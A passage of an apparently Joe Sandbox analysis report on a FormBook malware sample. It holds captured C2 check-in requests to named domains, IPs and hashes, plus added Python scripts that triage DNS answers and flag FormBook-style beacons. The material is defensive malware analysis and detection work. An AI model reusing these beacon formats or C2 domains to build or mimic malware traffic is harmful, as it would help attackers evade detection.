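    (0, "www.garimpeirastore.online", "A", "209.99.40.222"),
]

# Assumption for this example: extend with other parking providers as needed.
PARKING_SUFFIXES = ("parkingcrew.net",)


def build_index(answers):
    """Return (reply code per name, CNAME map, A-record map)."""
    rcode, cname, a_records = {}, {}, defaultdict(set)
    for code, name, rtype, data in answers:
        rcode.setdefault(name, code)
        if rtype == "CNAME":
            cname[name] = data
        elif rtype == "A":
            a_records[name].add(data)
    return rcode, cname, a_records


def queried_names(answers):
    """The names the sample asked for: every record name that is never a CNAME target."""
    targets = {data for _, _, rtype, data in answers if rtype == "CNAME"}
    seen, names = set(), []
    for _, name, _, _ in answers:
        if name not in targets and name not in seen:
            seen.add(name)
            names.append(name)
    return names


def resolve(name, cname, a_records):
    """Follow the CNAME chain from name to its A records; stops on a loop."""
    chain = [name]
    while name not in a_records and name in cname and cname[name] not in chain:
        name = cname[name]
        chain.append(name)
    return chain, set(a_records.get(name, ()))


def triage(answers, parking_suffixes=PARKING_SUFFIXES):
    rcode, cname, a_records = build_index(answers)
    by_ip = defaultdict(list)
    report = {"unresolved": {}, "parked": [], "shared": {}, "unique": {}}
    for qname in queried_names(answers):
        if rcode.get(qname, 0) != 0:
            report["unresolved"][qname] = rcode[qname]
            continue
        chain, ips = resolve(qname, cname, a_records)
        if any(n == s or n.endswith("." + s) for n in chain for s in parking_suffixes):
            report["parked"].append(qname)
        for ip in ips:
            by_ip[ip].append(qname)
    for ip, names in by_ip.items():
        if len(names) > 1:
            report["shared"][ip] = sorted(names)   # one address, several candidates
        else:
            report["unique"][names[0]] = ip
    return report


if __name__ == "__main__":
    for bucket, value in triage(DNS_ANSWERS).items():
        print(bucket, value)
```

Three of the twelve candidates never resolved, one sits on a parking provider, and three collapse onto 34.102.136.180, which (per the Snort alerts above) answered every check-in with 403. That leaves a short list of addresses worth a closer look in the HTTP sessions; the script makes no claim about which of them is the live C2.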

                                                                      HTTP Request Dependency Graph

                                                                      • www.cochez.club
                                                                      • www.cindywillardrealtor.com
                                                                      • www.wideawakemomma.com
                                                                      • www.vermogenswerte.com
                                                                      • www.thenorthgoldline.com
                                                                      • www.extinctionbrews.com
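
The GET requests FormBook sends to each of these hosts (recorded in full in the HTTP Packets listing that follows) share one shape: no User-Agent, "Connection: close", a path of a single short alphanumeric segment, and a two-parameter query in which one value is a long base64-alphabet blob and the other a short token, the same path and token reused across unrelated domains. The script below is an added example and is not code from the sandbox or from this report; it turns those traits into a scoring heuristic and runs it over the two requests copied from the captured sessions plus one constructed benign request. The length thresholds and the three-reason cut-off are assumptions chosen for the example, not a published signature.

```python
"""Heuristic triage of raw HTTP requests for FormBook-style C2 check-ins.

Added example, not code from the sandbox or the report. The two FormBook
requests are copied from the captured sessions on this page; the benign
request and all thresholds are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Base64 alphabet including '+', '/' and '=' padding. FormBook does not
# percent-encode the '+' in its query value, so the raw query is inspected
# without decoding (parse_qsl would turn '+' into a space and break this).
B64_VALUE = re.compile(r"^[A-Za-z0-9+/=]{40,}$")
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")


@dataclass
class Finding:
    host: str
    path: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # Assumed cut-off for this example: three or more traits present.
        return len(self.reasons) >= 3


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request head into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def raw_query_params(query: str) -> list:
    """(name, value) pairs taken verbatim from the query string, no decoding."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def score_request(raw: str) -> Finding:
    req = parse_request(raw)
    url = urlsplit(req["target"])
    hdrs = req["headers"]
    finding = Finding(host=hdrs.get("host", ""), path=url.path)
    if req["method"] == "GET" and "user-agent" not in hdrs:
        finding.reasons.append("GET without a User-Agent header")
    if hdrs.get("connection", "").lower() == "close":
        finding.reasons.append("Connection: close on the first request of the connection")
    if SHORT_PATH.match(url.path):
        finding.reasons.append("single short alphanumeric path segment")
    params = raw_query_params(url.query)
    if len(params) == 2:
        long_blob = any(B64_VALUE.match(v) for _, v in params)
        short_token = any(v.isalnum() and 2 <= len(v) <= 6 for _, v in params)
        if long_blob and short_token:
            finding.reasons.append("two-parameter query: base64 blob plus short token")
    return finding


def group_by_path(raws) -> dict:
    """Map each request path to the hosts it was sent to: one path reused
    across unrelated domains is the pivot for the rest of the candidate list."""
    groups = {}
    for raw in raws:
        f = score_request(raw)
        groups.setdefault(f.path, set()).add(f.host)
    return groups


# Copied from the captured sessions on this page.
FORMBOOK_GETS = [
    "GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1\r\n"
    "Host: www.cochez.club\r\nConnection: close\r\n\r\n",
    "GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1\r\n"
    "Host: www.cindywillardrealtor.com\r\nConnection: close\r\n\r\n",
]
# Constructed benign request for contrast.
BENIGN_GET = (
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n"
)

if __name__ == "__main__":
    for raw in FORMBOOK_GETS + [BENIGN_GET]:
        f = score_request(raw)
        print(f.host, "SUSPICIOUS" if f.suspicious else "ok", f.reasons)
    print(group_by_path(FORMBOOK_GETS))
```

Used on a proxy or Zeek HTTP log, the same scoring applies per request; the path grouping is what makes the rest of the sample's domain list visible once one host has been flagged, because every candidate receives the identical /dy8g/ path and htxh token.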

                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49734 | 95.215.210.10 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:05:24.568625927 CEST | 9835 | OUT | GET /dy8g/?i8PHMrf=M2y08b4guDc7ky1UfP9B2E9DVQMkOM+mjhyUMO8ZT8ajlM0broLEOhQJKgG+gbTLwEQu&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cochez.club
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:05:24.706911087 CEST | 9836 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Thu, 22 Jul 2021 16:05:24 GMT
                                                                      Server: Apache/2.4.6 (CentOS) PHP/7.3.19
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 79 38 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dy8g/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49735 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:05:29.842456102 CEST | 9837 | OUT | GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.cindywillardrealtor.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:05:29.980777979 CEST | 9837 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:29 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60f790d8-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID:2
Source IP:192.168.2.5
Source Port:49736
Destination IP:34.102.136.180
Destination Port:80
Process:C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:05:40.453010082 CEST | 9838 | OUT | GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.wideawakemomma.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:05:40.590605021 CEST | 9839 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:05:40 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef679d-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID:3
Source IP:192.168.2.5
Source Port:49739
Destination IP:172.104.157.41
Destination Port:80
Process:C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:05:45.704566002 CEST | 9855 | OUT | GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.vermogenswerte.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:05:45.750137091 CEST | 9857 | IN | HTTP/1.1 404 Not Found
                                                                      Connection: close
                                                                      content-type: text/html
                                                                      transfer-encoding: chunked
                                                                      date: Thu, 22 Jul 2021 16:05:45 GMT
                                                                      server: LiteSpeed
                                                                      vary: User-Agent
                                                                      Data Raw: 32 37 38 61 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 
20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20
                                                                      Data Ascii: 278a<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


Session ID:4
Source IP:192.168.2.5
Source Port:49740
Destination IP:75.2.81.221
Destination Port:80
Process:C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:05:50.873647928 CEST | 9867 | OUT | GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.thenorthgoldline.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:05:51.027597904 CEST | 9869 | IN | HTTP/1.1 403 Forbidden
                                                                      Date: Thu, 22 Jul 2021 16:05:51 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 146
                                                                      Connection: close
                                                                      Server: nginx
                                                                      Vary: Accept-Encoding
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID:5
Source IP:192.168.2.5
Source Port:49743
Destination IP:34.102.136.180
Destination Port:80
Process:C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jul 22, 2021 18:06:08.622399092 CEST | 9871 | OUT | GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1
                                                                      Host: www.extinctionbrews.com
                                                                      Connection: close
                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                      Data Ascii:
Jul 22, 2021 18:06:08.765433073 CEST | 9872 | IN | HTTP/1.1 403 Forbidden
                                                                      Server: openresty
                                                                      Date: Thu, 22 Jul 2021 16:06:08 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 275
                                                                      ETag: "60ef6789-113"
                                                                      Via: 1.1 google
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
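The five explorer.exe sessions above have one shape: a GET to the fixed path /dy8g/ with the same two query keys (i8PHMrf and 5jLtOl), a different Host on every request, Connection: close, no User-Agent header, and seven zero bytes after the headers (the "Data Raw: 00 00 00 00 00 00 00" lines). None of the hosts answered with anything but 403/404, which is expected when the decoy domains in the C2 list are not the live panel. The Python below is an added example, not part of the Joe Sandbox report, that parses raw HTTP request dumps and flags that shape; the five request strings are copied from the sessions above, the firefox.exe control request is constructed, and the three-host threshold is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Sample input: the five explorer.exe requests recorded in the sessions above
# (headers plus the seven zero bytes of body), and one constructed browser
# request as a negative control. Added example data, not report output.
NUL7 = "\x00" * 7
SAMPLE_REQUESTS = [
    ("C:\\Windows\\explorer.exe",
     "GET /dy8g/?i8PHMrf=d70oYrFBgMb8Os9vLLnU0lHHdKTBSZLAimar8DFO2VzVjiqJdJvZleKp8o5Ll6MGkmh7&5jLtOl=htxh HTTP/1.1\r\n"
     "Host: www.cindywillardrealtor.com\r\nConnection: close\r\n\r\n" + NUL7),
    ("C:\\Windows\\explorer.exe",
     "GET /dy8g/?i8PHMrf=n9TsU/XZirCaXaeSUYbcU/ldcwtyxBDUqcAV1OuBRveQ+2sj4hTKAs/tsBNJEPRO40QM&5jLtOl=htxh HTTP/1.1\r\n"
     "Host: www.wideawakemomma.com\r\nConnection: close\r\n\r\n" + NUL7),
    ("C:\\Windows\\explorer.exe",
     "GET /dy8g/?i8PHMrf=vEc9l3KIwUbL2yE9akOYH6tpFpdH8sidHZA37HjQYo0aYTivi/dQORBe2IJ6crCUqb4r&5jLtOl=htxh HTTP/1.1\r\n"
     "Host: www.vermogenswerte.com\r\nConnection: close\r\n\r\n" + NUL7),
    ("C:\\Windows\\explorer.exe",
     "GET /dy8g/?i8PHMrf=ECrCAtcV2n6MmfvkEdEbFHcY5Y6SYRzoX56/iPQe4p5qRx/lRHZ+fK1TxUEBZfQE2R2Q&5jLtOl=htxh HTTP/1.1\r\n"
     "Host: www.thenorthgoldline.com\r\nConnection: close\r\n\r\n" + NUL7),
    ("C:\\Windows\\explorer.exe",
     "GET /dy8g/?i8PHMrf=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGD3PCL74z9p&5jLtOl=htxh HTTP/1.1\r\n"
     "Host: www.extinctionbrews.com\r\nConnection: close\r\n\r\n" + NUL7),
    # Constructed control: an ordinary browser request that must not be flagged.
    ("C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
     "User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"),
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/1\.[01]$")


def parse_request(raw):
    """Split one raw HTTP/1.x request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError(f"not an HTTP/1.x request line: {lines[0]!r}")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    target = urlsplit(m.group("target"))
    return {
        "method": m.group("method"),
        "path": target.path,
        "query_keys": tuple(sorted(parse_qs(target.query, keep_blank_values=True))),
        "host": headers.get("host", ""),
        "headers": headers,
        "body": body,
    }


def find_beacons(requests, min_hosts=3):
    """Group requests by (process, path, query keys) and flag groups that reach
    at least min_hosts distinct Hosts without ever sending a User-Agent."""
    groups = defaultdict(list)
    for process, raw in requests:
        req = parse_request(raw)
        groups[(process, req["path"], req["query_keys"])].append(req)
    findings = []
    for (process, path, keys), reqs in groups.items():
        hosts = sorted({r["host"] for r in reqs})
        if len(hosts) < min_hosts or any("user-agent" in r["headers"] for r in reqs):
            continue
        findings.append({
            "process": process, "path": path, "query_keys": keys, "hosts": hosts,
            # Secondary traits seen in the report: Connection: close and a 7-NUL body.
            "connection_close": all(r["headers"].get("connection", "").lower() == "close" for r in reqs),
            "null_body": all(r["body"] and set(r["body"]) == {"\x00"} for r in reqs),
        })
    return findings


if __name__ == "__main__":
    for f in find_beacons(SAMPLE_REQUESTS):
        print(f"{f['process']}: {f['path']} {f['query_keys']} across {len(f['hosts'])} hosts, "
              f"Connection: close={f['connection_close']}, NUL body={f['null_body']}")
```

The grouping key deliberately ignores the query values, which change on every request, and keys on what stays constant: the originating process, the path and the parameter names. A single explorer.exe instance walking a fixed path across five unrelated domains with no User-Agent is the signal; the Connection: close and null-body traits are reported alongside it so an analyst can see how closely a hit matches this sample rather than having them silently widen or narrow the rule.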


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior


                                                                      System Behavior

                                                                      General

                                                                      Start time:18:04:32
                                                                      Start date:22/07/2021
                                                                      Path:C:\Users\user\Desktop\pMbPS8nCm1.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\pMbPS8nCm1.exe'
                                                                      Imagebase:0x400000
                                                                      File size:177067 bytes
                                                                      MD5 hash:DE87F1794377537DDA721AFD9137E491
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.248608890.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
